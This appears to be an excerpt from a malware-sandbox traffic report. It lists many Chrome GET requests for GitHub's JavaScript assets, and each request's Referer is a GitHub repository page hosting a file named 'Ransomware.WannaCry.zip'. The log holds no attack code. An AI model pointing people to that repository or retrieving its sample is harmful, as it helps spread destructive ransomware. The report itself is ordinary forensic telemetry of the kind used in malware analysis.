              Source: global trafficHTTP traffic detected: GET /assets/app_assets_modules_github_sticky-scroll-into-view_ts-94209c43e6af.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-467754-244ee9d9ed77.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-9285faa0e011.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/behaviors-4e25e265ef84.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-d0256ebff5cd.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/notifications-global-352d84c6cc82.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/code-menu-614feb194539.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/react-lib-1fbfc5be2c18.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_primer_octicons-react_dist_index_esm_js-node_modules_primer_react_lib-es-2e8e7c-a58d7c11e858.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-8f8c5e2a2cbf.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-d5726d25c548.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js-1501d3ef83c2.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_Overlay_Overlay_js-node_modules_primer_react_lib-es-fa1130-829932cf63db.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_Text_Text_js-node_modules_primer_react_lib-esm_Text-7845da-c300384a527b.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_FormControl_FormControl_js-f17f2abffb7f.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_ActionMenu_ActionMenu_js-eaf74522e470.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-978abc0-add939c751ce.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_react-router-dom_dist_index_js-3b41341d50fe.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_PageLayout_PageLayout_js-5a4a31c01bca.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_ConfirmationDialog_ConfirmationDialog_js-8ab472e2f924.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_Dialog_js-node_modules_primer_react_lib-esm_TabNav_-8321f5-2969c7508f3a.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_TreeView_TreeView_js-4d087b8e0c8a.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_Avatar_Avatar_js-node_modules_primer_react_lib-esm_-4e97c6-949a0431d8c0.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/ui_packages_react-core_create-browser-history_ts-ui_packages_react-core_AppContextProvider_ts-809ab9-4a2cf4ad7f60.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/ui_packages_react-core_register-app_ts-3208e4c5b7c1.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/ui_packages_paths_index_ts-ea3e1b2a33c6.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/ui_packages_ref-selector_RefSelector_tsx-dbbdef4348e2.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-a73d65-239b92c64d22.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/app_assets_modules_react-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_ho-3e492a-f8db4e5bb6ca.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/app_assets_modules_github_blob-anchor_ts-app_assets_modules_github_filter-sort_ts-app_assets_-e50ab6-fd8396d2490b.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/react-code-view-c04a0c63417c.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_primer_react_lib-esm_Button_IconButton_js-node_modules_primer_react_lib--23bcad-01764c79fa41.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/keyboard-shortcuts-dialog-20a011926f27.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-11f6759e1cef.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/sessions-694c8423e347.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-7c5e7b04edd6.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/chunk-vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-ffadee0-5cdb6954f6de.js HTTP/1.1Host: github.githubassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://github.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zipAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
